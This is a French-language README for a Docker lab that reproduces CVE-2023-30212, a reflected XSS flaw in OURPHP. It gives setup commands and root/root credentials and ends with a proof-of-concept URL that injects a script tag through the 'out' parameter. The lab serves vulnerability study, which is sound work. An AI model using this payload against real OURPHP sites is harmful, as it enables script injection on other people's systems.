
Laboratoire OURPHP vulnérable basé sur Docker pour reproduire CVE-2023-30212, une vulnérabilité XSS réfléchie, avec instructions d'installation et URL d'exploit preuve de concept.
Prérequis
Télécharger docker.io
sudo apt install -y docker.io
Téléchargez tous les fichiers de mon dépôt en utilisant la commande ci-dessous.
git clone https://github.com/AAsh035/CVE-2023-30212.git
Maintenant, pour créer une image Docker, exécutez la commande suivante :
sudo docker build -t vuln .
Ensuite, il faut transformer l'image Docker en conteneur. Le conteneur doit fonctionner sur le port 80. La commande est :
sudo docker run -d -p 80:80 vuln
Pour vérifier si le conteneur est actif, utilisez la commande :
sudo docker ps
Tapez 127.0.0.1 dans le navigateur et une page OURPHP se chargera.
Vous devez configurer ourphp avec les informations suivantes :
Nom d'utilisateur : root
Mot de passe : root
Nom de la base de données : vuln
Maintenant, vous devez configurer le nom d'utilisateur et le mot de passe pour l'administrateur. Définissez les éléments suivants :
Nom d'utilisateur : root
Mot de passe : root
Maintenant, copiez le lien ci-dessous et collez-le dans le navigateur :
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>
https://github.com/AAsh035/CVE-2023-30212/assets/136836668/218c8eca-f02b-41b2-931b-ba112da6c7e0